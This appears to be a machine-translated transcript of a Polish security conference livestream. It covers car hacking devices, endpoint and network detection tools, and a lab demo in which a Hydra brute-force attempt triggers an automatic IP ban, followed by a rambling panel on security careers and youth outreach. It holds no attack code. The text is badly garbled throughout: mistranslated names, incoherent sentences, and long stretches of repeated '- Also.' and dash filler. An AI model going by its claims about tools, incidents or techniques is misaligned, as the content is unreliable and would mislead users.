it connects with all known databases, such as LVD, VQ1, ASRG, it is an internal architecture. You can search for tips on the automotive industry. Also OWASP, of those I have not mentioned, it is worth mentioning. Fourthly, there is the lack of or negligible authentication. Nobody takes it seriously. And the fact that these old protocols are, unfortunately, quite dirty. Further, if we think about cybersecurity of telecom systems, We have Macierz Mitre, who is well-known and liked by many. He recently started a cool project. Macierz and Mitra now have access to analytical data on techniques and the discovery of these techniques. It's a great update. It's cool to use it in Sokół, but that's not the point. There is also Macierz Zagrożeń, which was produced or supported
by Auto-ISAC, focused on automotive industry. It looks like a machine, even the techniques are described in the context of automotive environment. One of the techniques is also Exploit via Removed Media. We have USB drive, so we can use BIM, VUMIDIA in the car, or SD card, because in some cars we update our navigation using such cards. My previous name was "Krupek" and it was in "Ki" SD card was inserted into infotainment and then this update was going on. And where did I get the update of this navigation? Of course, from the manufacturer. Another factor. - software of these stations, are also included in the IS2 directive. So the automotive sector is the first regulation that should
affect the security of these systems. And an old thing, but I think it's interesting, because it shows... This is a so-called Game Boy. It's a device that connects to the ECU responsible for the vehicle's support. Because when we have a wireless key, there must be some connection. So it connects to the Game Boy and brute forces it. It usually takes 20-30 minutes, because the game has all stolen codes that we usually use to program our vehicles and car keys. These codes were simply dumped somewhere, but this Game Boy simply has them all with it and tries to connect the corresponding code with the vehicle. Such a device costs about 40 thousand zlotys. for some reason, Bulgarians
specialized in Poland in attacking... It was probably about... ...about the knowledge that was gathered from different sources... ...not only verified, but also to put USB into one of the servers... ...data center... ...one of the servers... ...data center... The Russian who worked for Leslie didn't want to go to the court because of AI. They dragged Klitschkova into their operations. And it was verified that he had a connection to something like that. at the same time when the USB port was about to be shot down, there was supposed to be a strong attack, a decoy, a DDoS attack on Tesla, so that no one would take care of it. Well, they got the guy, the attack on Tesla didn't work, he was sentenced to 10 months,
probably, the trial was not long ago, so probably So you're already going live? We're already going live, right? Okay, today we're going to talk about the 3 minute record because we have to get ready in half an hour. I think we can fit in. Okay, the question is: I have a question for Krzysiek. If anyone wants to give some data, feel free to do so. I work in Securitum, I am an admin of Linux. You probably know that we do audit training, we publish books and we make cool posts. And before we move on, this is the award in the competition today. If anyone wants, there will be a contest question a little later. This is a new book of
Krzysztof Busiński about Sint, how Sintians are here and something that is definitely useful. Okay, listen, we know what categories we have, right? Does anyone know anything from here? Who doesn't know these systems? I don't know. I don't know. All of you? You don't know? I'm sorry. All of you? You don't know? I'm sorry. Okay, the car is a computer on wheels today, so you can really get away from it. Tell the car you want to buy. The car I want to buy has a Corbotronic, you know? The car I want to buy has a Corbotronic, you know? And it's older than you. is older than you. And he buys only because... And he buys only because he is not old enough. So
we have analysing and detecting such threats at the end. It is very important that it happens at the end. We always remember that EDM works on the end, not in the network, not in such infrastructure somewhere in the middle, but actually on the ends. And we do the analysis of the cause of this state. And this is very important in EDM, that they begin to learn by heart. So when EDM appears, They start to learn slowly, they start to understand what is really a normal state for us, and what is already practical and should not happen in Poland. Have you ever heard of something like this? Does anyone know how it works? Who knows how MDR works? I'll give you
a book for it, but I see that you don't. Do you have a friend who is scared? Where? Down. Where? It's not the same. They are taking decisions based on network traffic, whether it is suspicious or not. And what's next? Based on this, some kind of transporting and actions. They are normalizing this network traffic, so we have one character again. We don't have such flows yet, only these flows are normalized to one character. identify these anomalies. Come on, let's go. One, only, two. They warn us. And it's very cool that some of these new NDRs, I mean, first of all, they warn us about potential attacks and the direction of these attacks. In the previous video, when I was working on the test of one render, I
could see the geolocation of this event. At least until someone is in the geolocation group, it actually works. Even if he doesn't know anything, he doesn't have a database, he will start checking if it is not some kind of a bug. And internal threats, which is often brutalized because few people, few companies expect to be an insider. And an insider, apparently, is not such a small threat, because the capture of some pendrive, as we had in the previous reaction, can be deadly for us. - Is pendrive a killer? - Also. - Yes, also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. -
Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. -
Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also. - Also - Also. - Also - Also. - Also - Also -
Also. - Also - Also - Also - Also - Also - Also - Also - Also - Also - Also - Also - Also - Also - Also - Also - Also - Also - Also - Also - Also - Also - Also - automation and analysis. What does it consist of? It consists of the fact that when we build the appropriate rules, we build the appropriate mechanisms, we will tell him how to behave in certain situations, then at some point he will realize: "Aha, this is the same Mario, so let's go, thank you, goodbye." And usually they have a very simple Looking at the four users I was dealing with, their producers are trying to make it as intuitive as possible. An analyst
doesn't have to be a person. An analyst has to be an analyst. He doesn't have to be an admin, he doesn't have to look through 30 cards. It is supposed to get the complete data and then actually analyze it, i.e. check what is happening there. And this is the image of the entire infrastructure, i.e. the correlation of this data with various sources. Why? What do we expect? Will we have the same endings? If we don't know what's happening on firewalls, if we don't know what's happening on these switches, if we don't know what's happening on our machines, which are somewhere plugged in, but in fact they are not monitored in any way. Does anyone work in automation?
With some OT? Or is IT itself sitting here? Is IT itself? Dear ladies and gentlemen, how do you monitor firewalls, for example? Not by the name of the products, but how. I would like to know. I would like to play with it. You know, it's like with another Zabix. Once you could do a hatop, check what's going on on the machine. Today you have a Zabix. Only the question is what hatop is good for today. You can only do it. If you have 30 machines, it's already a hundred days. Than such, than such. If I go to sleep, other hackers are also going to sleep. If you go to sleep, everyone is going to sleep. Will you close
your eyes or not? You won't close your eyes, it's my favorite example. You close your eyes, or you can't see. You can't see. Oh, oh. It's a bit more complex. It's more complex and it's better. I'll turn off the computer. It turned off. When a prelegent comes, he has too much fun and then... Because instead of using some civilized man, some logitech, to do this, he uses a flip-flop to produce. Okay. And now, listen, my dear. What types of attacks could we find today with such an XDR? The simplest. Three simplest. Ransomware? What? Ransomware? Well, something would probably be found. What else? Something that is less popular today. I think that when quantum computers come
out, it will be very popular again. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - And now, if we have this type of attack, then we usually have some symptoms of these attacks. If we have ransomware somewhere in our int, how can it be revealed? How? How can it be revealed that we
have, for example, encrypted? Suddenly we have too many IOPs on disks on some machines. In the case of zero load. I really liked this answer about CPU. When we turn it on, we turn off the agent, and we have a system monitoring of these things. it is not so obvious that we can only check it. Let's see if it works. I'm not afraid to show you the password, because it's a secret for the morning and evening. At least there was no admin, admin didn't work. Four times repeated. According to the instructions, four different words, admin, admin, admin, admin also works. I have here on this lab a very well-established one. I have two agents set
up. And for these agents I have these communications, as the most often done, and they are working. When we go into it, somewhere further into these details, then besides the things we talked about here, you will see that it shows us, for example, I used to do this at some training or in the election. I did such a joke that participants came to me in the break and asked: "How would you update it now?" And we: "Okay, we'll update it." And we made a change from Debian 12 to Debian 13. And it did fall down. It did fall down. But it needed a moment to just go through the system once more. It was a few minutes and
we had absolutely no information about what was happening in this small system. So we already have one thing that is definitely a threat to our network. Because actually, every machine of ours is somewhere in the network. From some interesting things we have a threat hunting module. And in this threat hunting module we can also see the five-filer. And see, CPU is very close, if the metrics grow, if it will be visible that they will exceed these alarm states, then our X0 will inform us about it at this moment. If we start to lack disk somewhere, it will also start to inform us about it. I think this dashboard is so simple that it doesn't hold
it here, I think, in a special way. I assume that it is. Now yes, now yes, we have here some number of events, we have even the number of authentication failures, i.e. error of authentication. And we can try to start the soft hydra. One, two, three, four. Good. What is it for? For the building. Good. I have here somewhere, I have to see if it will be visible? It is visible. It is visible. Good. It is visible. Good. We can start it. It comes. It will fail in a moment. Why will it fail? Because, apart from the fact that we have a firewall somewhere, I don't know, like NFTA, IBRS, UEF, GU or, I don't know, Firewall,
there is an additional firewall through Bazooka, which is usually applied on client machines. And here is something called Active Response applied. I don't remember if I'm on at this moment, because I think it's still going on for a long time. We can check it out now. And in general, it's about the fact that when the certain gesture is exceeded, let's see if it shows something here, 486.5. How much was it? Half a minute? A minute? It was, as you could see, slowly adjusted. A few minutes can save us or not. Active Response in this case, where it is set here, works in such a way that when an alarm level is exceeded, this Host, its IP is cut off and thrown into the Host Linear.
So no communication is allowed. To load properly, as much as possible from this machine, where I started the Hydra a moment ago, I will get a bug anyway. I will get a ban anyway. As long as timeout doesn't go through, there will be no use of any communication at all. But absolutely none. There is no bing, cmp, anything. Nothing. Just nothing. This is a ban on timeout time. I have this timeout, of course, here on the left, it's a short one. One or two minutes. - Nothing, it's the same as in the previous one. It's like that, but you know, here it automatically throws you to the corner, so you don't have to play with it. If this rule
actually works, then it will do it for you. You don't have to think about it, you don't have to think about it. You look at the dashboard, that something has started to happen. Your analyst can immediately move on to the actual management, because it's really an incident, isn't it? .
In this particular case, we have a lot of nice rules already described. We have 4,500 rules written, but that doesn't mean that this is all we can do. We can also write our own, completely as we want, but we have to... It will be boring. I have it set to a virtual machine that has 4 GB and 2 VCPU. And it's bored at the moment. There on the Wazuka website you have something like that up to 1000 is enough 4 GB, if you want. Generally, there, at least, what they recommend, at least, it's 2 GB. It should. The network works. The network works. The agent is doing nothing at all, actually. But the process of memory in time is not very good. The
question is, in general, one problem. If you have a tube, it's cool, you can have it. If you have a CD, it must do something more interesting than just a tube. More interesting than just a tube. It's a punishment. It's a punishment. To do something more interesting, you must have some rules in your head. If you have a CD in your house, you can add it to your house. It won't disturb your YouTube watching, I can approve it. What are you doing? Do you think that a agent's smoothing can be harmful? Agent's smoothing? I know. We can test it. We can test it in a moment, if you want. And we'll think about whether it's a
source of harm. Yes. Maybe it's already been a month since the system started working?
I check these passwords. In any case, I check them. Because I think I have too many systems in my head and I'm starting to get confused. I'm wondering if you have two agents, or you just have three? One will show up, the other will move, disperse, as I did recently. And generally, I know that I have two agents. It didn't work, or it didn't work, or it didn't work. There is some communication, but I don't know what to do with it. Generally speaking, I think I remember it from what I remember, the information is exchanged for the keys, agent, server. Just like there is this creator, he gives you the script and there is the key already. I don't know the key either. I mean... There
you only give the address of the server and the name of the agent. Yes. And at the installation... Yes, for sure. : I'll tell him and he'll immediately be safe. Okay, listen. When asking, he doesn't ask for a password. He doesn't ask. In this way, the committee of the National Security Service and the Department of the Interior will be able to communicate with each other without any chance that they will not know. We will probably test the topic. . This machine is offline. When it connects to the network again, it will automatically return. If you have a device somewhere in the network, and it falls, we will have this information that it has fallen. Exactly. Does it
report what it did last time when it was offline? Exactly. Or does it not change it? Exactly.
You have to give it on the other side. On the second one, the middle right. The middle right. Typical information, who has it? It was so climatic for a moment. Almost like at home. When you explain the concert, I think about these people. Krzysiu, we get a discussion on the panel, or are we going? You are an expert, everyone who has ever performed can be an expert. I will send you the question: how many are willing? We have one. No, no, no. You're standing in the same place, aren't you? Here you go. So we have a cryptography specialist. Maybe another cryptography specialist will come. Who will give more? Maybe there won't be enough of this two. We leave the chair. I don't want to. I'm
afraid that if you consider this feature, the less you know about something, the more authoritative you are. His take, this, that. This is a good idea. The one who turns back now. We invite Mr. Advertiser, Mr. Macu, who else? Minas, come on. I can also scream. I don't think you'll get out. Maybe we put everyone on one side so he can set the camera so that it can be seen. So, Krzysiek, are we going to kill each other? I will not move you. I understand I understand. Some people can't speak without hearing. Come on, come on, come on. Okay, I hope you have a zero package. Two more chairs. Two more chairs. Don't be bold. Every prelegete today,
come on. Come on, come on, come on. You have been presenting for 10 years in a row, so you are also very good. Okay, who should I draw here? Mr. Adversary, come on. And Mr. Kaczuszkowy, I invite you to do it. No, forget it. Why? Well, think about it, which specialist... - I have a friend next to me, he's a great guy, a guy who can do better than me in Linux. - Don't exaggerate. - A guy who... - Well, go and pick it up, there's none. - No, no. - I'll deliver the chair. - No, thanks. - Okay. - Well, there will be one empty chair. - You can sit here closer to your colleagues, sit in
such a chair. - But look, she didn't take me, she only wanted you. Well, the first question for everyone. What can you hear in the red-teaming in Poland? It's Boris, it's not Boris, it's not red-teaming. Does anyone do red-teaming in Poland? Is anyone from Poland? I don't know, I'm not in Poland. I don't know either. This side is not in Poland. This side doesn't do red-teaming. Does anyone do red-teaming? Is there a person in the audience who does red-teaming? Now they are afraid to say that they will not get the pass. So we don't know what's going on. Who will be the responsible one? I am. What's going on in the Red Teaming in Poland? Question for Mac. How did you
like the salad? It's fucking delicious. But it's not a salad. I don't know if there is any salad. Great. I heard that the one you ate in the third edition was very tasty. Who remembers that? Ok, great. Another question, and here for each of you, seriously. Please introduce yourselves to the audience, and tell us in two or three words what you do. Please. My name is Grzegorz Grubel, I work as a security engineer in CivicPro, I've been working in the security industry for 12 years, I'm working in Security8 in the free time, I work at the Asperger's portal, it's a private initiative. Thank you very much. I am Oskar. I am a professional, I write letters in order and
then people read them. And I write mainly about what is happening in the space, in the context of various incidents. I like to do it very much. I'm 12 years old. My name is Mac. I've been doing malware for 12 years. My name is Michał Trynara. I can't tell you what I do professionally, but I'm a hobbyist and I run a few open source projects, such as the OSS Sign Code tunnel in P11. Great. Question for the editor: Have you ever written malware? No. Thank you very much. Question for the pilot: When is the next episode of Missiles in the trailer? I don't know, it depends. What episode? The weather. Great. Question for the trojan.
When will e-tunnel support the internet? In what sense? When will it be possible to set up e-tunnel connection via the internet? But why? Good question. So never. Okay. Now a question for everyone: how to start in security? Standard, as they do. Don't start. Exactly, don't start. I've been saying "don't start" for so many years in security, what a pity. Everyone's losing their hair. Are you afraid of work? I'm a picky eater, I'm sorry. You have to like to spoil things. If you don't like to spoil things, if you don't like to spoil toys, it's better to do something else. Maybe not always. - Take care of security. - Not everyone has to. - Nervous work. - Very. - Healthy. - The
shoulders sit down. - The legs sit down. - I recommend it. - Paranoia falls. - No, I won't ask this question. - Read it. - Have you ever exploited your ability to play carotid? - Yes. - No problem. - But don't worry so much. - No. I will wait for the presentation on Mayhack on Tuesday. Of course, questions from the room can also be asked. Does anyone have any questions? But in relation to the previous question, if someone wanted to sponsor some toy... To improve the habit of... To improve penetration. Penetration tests with toys, maybe we'll leave them in the office. Maybe you'll need a volunteer to play with them. We have already completed the pen tests, so maybe another question. How to
enter the Blue Team? I don't know, I haven't been. Same in security. You have to go to work. You're the only one who does the Blue Team. Wear a blue shirt. And be ready to work on the changes. Build some home labs, hangers at home, you can put it on, play. For example. For example. No, no, no. Oh no. I have a more difficult question about the previous one. Do you want to play or in the Blue Team? In the Blue Team rather. I mean, there can't be a play in the Blue Team, it bothers me. What they give there, right? Exactly. Listen, the question was how to start in the Blue Team, I have such
a difficult question. How to finish? How to start in the Blue Team, since everyone wants seniors for the day? You have to be a senior from the beginning. If seniors want. This is an interesting question, because there is a problem that nobody wants to hire a junior, so there is no place to learn internal work. I worked in a corporation as a senior. I'm not sure how it looks like. You start to be a researcher. You have to be interested in what you want to study. Can you be senior, principal or something else? Yes, because it's not a matter of... What does it mean? Junior, senior, do you sit in this since you were young? Do you have high skills? Did
you sit in the corps for half an hour? What does it mean? You know, it's the best question. I mentioned two companies where I worked for almost 9-9.5 hours. And there was absolutely zero development. So if there are a lot of people working there, they are seniors, they are seniors from the beginning. But it's not skills. Exactly. Sir, if you want to be a senior, you can be a senior in a situation of the age, in understanding skills, there is no problem. Skills can be outside of work. Two hours in the corp, it's another matter. It's a matter of dedication and all the work. foreign I would encourage you to... Wait, wait, you told me not to start working. If someone has a passion, no,
if someone has no passion, let them not start. If someone has found a passion for themselves, then I have a passion too. I'm just on the other side. Someone has a passion, but he doesn't work in cybersecurity. Yes. Because I don't have a passion for cybersecurity anymore. But you know, you lost it in time, not from the beginning. Yes, but it kills, right? I also assume that if you don't have a job, then this job is not good. So you were fired, right? For money? No, it's what they cheated on us a long time ago. They said you should do what makes you happy at work. On the one hand, yes, but then it doesn't
make you happy later, because you do it at work. If you want to do the same thing all the time, I don't know, you stopped playing, doing anything other than work. I think it would be nice, maybe it would be interesting, I don't know if it would be interesting, but it would definitely be healthier and more mentally healthy to have a job that is not your hobby, because then you don't have a hobby, you only have the next job. Yes. But on the other hand, if you don't have the passion for work... I'm not saying that you should be a hopper, but if you don't have the passion, then it's a big bummer, right? That's
also true, yes. On the other hand, you can treat it as work from 9 to 7, you know, you finish work, you finish work, you have to transfer money to the corporate, you transfer money and you finish, you do something else. I don't know if I can agree with this. I mean, the topic is so, in my opinion, the topic is so wide, security, that even if you do some security at work, you can do other security outside of work, which is also fascinating. You can go to work or go home to do something else. Or vice versa. On your own job. With your own toys. I do it the other way around. I mean, for example, I
spoil things at work, and at home I do some development. Hobby-like. Great idea. Gentlemen, what interesting thing have you discovered recently? I'm going. Discover. I have a very nice restaurant near my house, I don't know if you know it, but it was quite tasty. And is it somewhere here? No, it's near my house, far away. I found Excel marks that should not be public and they are no longer public, so I'm glad about that. Congratulations. Bravo, Mr. Editor. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 2 GB could be enough. Or in RAM or on the processor for 32 GB. Only not so fast. But more than 10 tokens per second. I have a plan. Okay. You will put it? Of course. At least around the house. Maybe a question. Have you read something about this new standard for the digital printing? Or something else? Do you have any opinion on this subject? No, I haven't had to deal with it yet. Gentlemen, if not a toy, then
what? A piece of cake. Cakes. A charity toy? I heard that ducks. Can't a duck be a plaything? No, I think there are organizations that say that it can't. I think the right to take a little bit. Thank you. I heard that some guy went there to feed goats or something like that. He became a farmer. Yes. I had to be a bit more relaxed. At the moment, it sometimes happens that you can't look at the farm anymore, but not goats, but a farm and a whole beautiful series of farms. Elkantów recently removed some things. Our chief, when it comes to international besides, Jack Daniel, not to mention alcohol, became a lute player and makes
guitars, various string instruments, so you can go in that direction. - So, you can do whatever you want. When you write a comment, you have information about the model right away. It's a kind of gratification. It's getting more and more important. It doesn't bother me to deal with physical materials, that when you improve them, they fall apart at some point. And I can improve the computer things infinitely. Oh no! We have to stop it. Do they achieve perfection? Never. I always have a lot to improve and I can always do it. How did I know that? You know, like one of my friends, he works in IT. Maybe you can join us? I'm looking for a safer place. And now he's
doing, for example, wooden stools, plus a door to this and really great stools. So something like that, maybe it's not a gratification for people. Come on, we have free chairs. No, no, no, thank you. But in fact, something like that shows that there is a group that is ready. Well, there are no questions on YouTube for now. Well, that's not a question either. Do you have any? And a question: would you guys like to say something from yourselves at the end? - - My advice is to do something interesting, publish it, share what you do, so that you don't only have it for yourself, but so that others can also use it. And I can't attack anyone.
No, so that at least others can see that you're growing. We can give another example that you can do something with yourself. Because even writing a blog shows that you are not standing still, but you are trying to do something, especially when you are a beginner. You start to work on some systems, then you start writing about it. They won't be good and they won't be correct. They will probably be okay. - Plus writing it also regulates your thoughts usually. Yes, it regulates your thoughts, it regulates your thoughts, and it's more interesting for the future. So this is a way for a junior to become a senior at once. Yes. Sometimes you will get some feedback.
Some of this feedback will be maybe constructive. 90% would be a shame for you anyway, but... But you can make up for this 10%. Ok, question from sen2653: How do you react when you see articles about security written in such a way that it's just a threat? I hear it first. There are a lot of such articles.
I don't know, I'll just put it on the table, because I can't give it away. If you don't try, you'll never write anything, right? No, the question was about how we react to articles that are... Whose, right? Wait, wait. What is the question? The question was, I'll read it again, how do you react when you see articles about security written in such a way that you just get lost? It's not that it's wrongly written, but that they only propose fear. It's probably just some kind of panic, writing such a thing. Maybe someone is interested in security thanks to it. But the idea of needless fear is always a bad idea. I won't be in every editorial office to talk about such articles. It's too much replying. But sometimes
it's good to scare people with smart toasters and so on. There is a question waving his hand. I have a question. Why do people not care about the police? Why people are not interested in security? But which ones? Because you don't have influence on such a car, you don't have influence on what BMW will do until you work there. Or you won't make a media look. But why people who work in these companies are not interested? People who work or people in general? It's complicated. First of all, they don't understand. Because it's a wasteful, disturbing thing. And it's best to deal with others. And we have a free mind and we can do whatever we want. It's not a joke. I have a theory that
the reason is much simpler. As an expert. People have sales provisions, not risks. Cyberpsychologist - He defined the concept of a normal person. - He proved that something like that exists. - It fits in the norm. - 50% is equal to the cross of the gauss, so you have two deviations, one on the one side and the other on the other side. - Where is the gauss? Where is Gauss? Gauss left. I don't know anything like normality. Okay, but it's just that most people, when they deal with people from cybersecurity, and they are not as cool people as here, usually they are people who say: You can't do that, don't use this version. Here you have to log in 10
times, because we will set you a session for 15 minutes. Here we will set you 2FA, and not necessarily, maybe you want to enter something else or connect some keys, etc. So these are people who usually contribute to ordinary people's work. And that's what it's all about. That's why I say people don't want to know. People are supposedly lazy, let's face it. Exactly. And they don't want to have unnecessary things, thanks to which they have free time for what they want to do. Digging in the ocean, I don't know, other things, it doesn't matter. People are supposedly lazy and that's why they don't want to have complications. Simple thing. But it's because of people's secrets
that you can't watch it directly from a Facebook video. No, you can. Let's go back to the topic. The right answer is this. Yes, it's connected. It's also like that. There is no responsibility. The programming industry is one of the few industries where no one is responsible for what happened. Every code is released as it is and that's it. - The next information we have is this guest in the Jekum's room, but we don't know which guest it concerns. A frog is cuckoo. So here the doctor says that frogs only cuckoo, so here are the people themselves, and people do not cuckoo, assuming. Maybe you just don't read stupid questions and troll them. You have to ask stupid questions. There are only stupid answers. And the video is
also stupid. The activist in the back. I have a question for the chief inspector. We all talk about running away from security or continuing this passion if a person has a passion. Do you have any idea how to encourage or discourage young people to use electronics for rabbits? Can we make a visa for children to show them security, but from the side that can fascinate, and at the same time show them that children, if it doesn't fascinate you, stay away. I am for asking boys in the States if they will clap and do it. In electronics, we can do it. They should be able to see that the room is visible from the side, so it's a good place. And
secondly, it's more for children who know something. But ISSA doesn't do it all by cyberscout. Yes, for example, contact the cyber-scout from ISSA. But this is not a level, we are talking about electronic technology. One of the best electronic technologies. - Ah, okay, fine. - It's about going to the youth. - Exactly, here are experts. You are the ones who already know something. Sorry, I'm not technical, so I'm probably the only one in this room who knows. - Me too. - Me too. but I know that there are two children who see, to be honest, that it's a big mess, because either they would like to do something, but they don't know where to go, or they are already in
the electronic engineering field, one of the best in Poland, They are not certified, they do not have 20 years of practice behind them, so maybe these children can be somehow supported, maybe they can do a one-day business for them, maybe they can go out on the field. But they can make a cardboard out of cardboard. It's better. It's a bit more fun. You can use it. There are a few people who later use cardboard. I wonder if anyone has contact with the school. I wonder if I would have it. . and they will go to school and they will be happy. It is something that can be done. Such things are done, as it was yesterday in Poznań or as
we did at the military academy. Not only, but also in schools. After all, most of them started in high school. No, most of them started when the high school was still in the planning stage. Ah, yes, because you are already old. Look at the middle age, there are no people here who want to be after high school. Mr. Editor, let's ask for peace. I finished my PhD, I'm an graduate student. I had a job at a university, I graduated from the Department of Computer Science and I had a teacher who fascinated me a bit. He allowed me to play with a wire-shark in my room. I could play with it. And of course, what I wanted to do, I wanted to
hack it. At that time I didn't know what I was doing. And I remember that I was just collecting my DNA, but I didn't control anything, so the whole room was full of internet. The class that had these classes was in the sky. But going back to merit, I think that it's also an important role for teachers to be involved in it, because I had a great teacher in the class, who had a big influence on me, that I was interested in it. And as a young man, I thought, how can I do how to show that I know something. And I started writing. And I will return this to everyone, as it was already
mentioned, to write and show that hey, I know something, maybe it's not much, but I can do something. It would be nice if you, maybe next year, as a webinar or something like that, tell people how to write. When you start writing. When you start writing. You take a pen and write. Yes, but how to describe it so that it can be published, I think it is a very useful skill, especially among young people. And what I would like to add here, first of all to you. People have the Internet. They can watch different people. You can really write to all these specialists. Wait, wait, wait. You know that you can watch different people. I know that. I have 40 different channels on YouTube subscribed.
But I know, and this one, this one, someone has to show it to him. Exactly. And he can also get on such ... But it's not like he wants to go on YouTube and find, you know, the right content, because he will get on some channel, some ... Rando. who did a 15-minute training on Udemy and it's not a new training he did there. These people need to be shown what they are to learn and how they are to learn from this YouTube. Great. The NotDehident Wiki is also a place where you can find such links. Yes, but you need to know about it. Exactly. The difference between today and when the church was starting
is in the amount of materials their quality. There is a whole lot of materials that are not very useful, not to say that they are wrong. The quality has grown, the quality has fallen. The more dramatically it has grown, the better. Moreover, now AISLOG looks good, and in fact it has a lot of information. I want to remind you of books that were mainly with short manuals from Linux. Or how to write viruses. No, it was a good book. You got me wrong. It's not like a young man wants to go on YouTube and watch it. He just wants to watch it. He just wants to know what he's doing. It's not like a woman who shows a great job. I've
learned a lot from this channel. She shows a lot of things. And if we want to do a training of Kubernetes in 15 minutes, it probably wouldn't be about it. But the concept of the machine is the same. So you would rather show the people on the map who is a valuable thing and who is not. So our case would be to replicate this analysis before they start monitoring it. I think that one thing that would be worth seeing their program, what they can do and what can be done from what they learn. Because you can ask them about software, which we are doing, but they sit in electronics. So that they can use what they already know. Because it gives motivation and quickly
gives some effect. Something useful. - It's a great idea. - They are Polish people, they do great things in the electronic industry. They create satellites in space, so maybe we should contact them. We should start with that. We should inspire them. That's why I have a question. Let's say they can write about the day, what about me? Would there be a chance? - There's always a chance. - There's always a chance. I mean, would Pisański be satisfied with that? If I would say what I'm called, I would just be like: "Oh, yes, thank you." If you say that Visa is effective, nothing will change. You know what, this is also a brand that we usually talk about 300-400 people per country, or more than that. And I suspect
that it was from Security Mall. Who was it? It's about the fact that the security know about it and we would like to show you something. But it's not about showing them, it's about engaging them. Because if you show them, it will be a boring and boring thing without anything. No, no, you didn't understand me. Showing children means inspiring them. Showing in the sense: "Look, you can do something cool. Start, for example, this way." So you need a big name for the management to let go and then a nice content to catch. Exactly. Listen, there is no problem. We can talk to the media, we can talk to the foundations and associations that have anything
in cyber. They will be nice, you will have nice people connected. No problem, you can do it. There is no problem, as I mentioned, it is not a problem. Great! The question is whether it can be done in such a short time. The question is whether it is about you working to hold a conference or you working to start a conversation with Mr. Greczek, with the director. I think that starting from who would do this conference and who would do it, because there are some ideas, hackathons and so on. It all takes time. You have to do it, prepare, think. Maybe I will say it from the other side, because we go to these schools from elementary school to high school.
. - . I don't want to say anything, I just say how it looks in reality, because for example we can communicate with the school and the parents' council says no and we thank them. It's their children, de facto. We have to make a nice program for these children. It doesn't have to be something super complicated. You get a router, each team gets a router and the winner will do the most interesting thing. Michał is taking part in the project that was mentioned here, Cyfrowe N-Scout. We will not talk about security, because they will become hackers, criminals and will be like those APT groups, which are afraid. I remember being a Microsoft Student Partner, doing
a hackathon at the university as a Bahamian at UZ. They asked me if the academic network could withstand it. I said: "What can it withstand? We will write code there, because hackathons are written for programming." "Oh, because we thought it was something hacker." What? So this is the awareness of people. But no, it came from this, above all, from this understanding of what a hacker is today. - I know. Oskar, don't go out. I try to say, to distinguish, but generally it is true, that unfortunately. But it's also just culture, Polish CRH hacker, right? Someone shapes culture, right? But you know, people are surprised when you do CTF, you understand, and they have to do something in analog, they are very surprised
that such a task in analog, you know, in CTF, where? Well, it's not like that. - The school told us that if we come for free, they don't want to pay us any money. Because for free, no. It's hard to make money, because if you pay money, you have to have a contract, maybe a responsibility for what happened. But for zero, they don't have any... It would be a hard thing to say. It's not a profit, it's a psychological mechanism that makes sense. The more you pay for something, the more you appreciate it. But it's also about the fact that in the case of paying even a small amount, they have a contract then and
they have specific documents in that contract, they stick to it. And so what? We can not come to the guest, for example. Oh, the tickets will be sold. And it's like in Żabka after 23:00 on prohibition, right? I don't know if you've heard how it's done. I'm not on the go. You can't stand in front of Żabka's guest for alcohol, but you can go to the club. Polish people will find a way to every recipe. History taught us that. Yes. The internal Polish hacker. It comes from the history of the meeting when being against the state was a hero. If I call to school, if I set the first meeting to tell what can be done for children,
is anyone willing to help you be a lecturer in the project? And that's what I was talking about, right? Because it's a matter of the road. How is it possible to go after that person and bring him? Do you have something to say? It will be a new law. It's up to you for three hours. For us, five. Eight? Eight? Eight, if you think about... If there is a situation, you are afraid to do it yourself. Listen, when it comes to all things related to cyber, psychology, BHP, or whatever you want from my competition, I just do it in the dark. I have to go to the office two days earlier. I'm not sure if
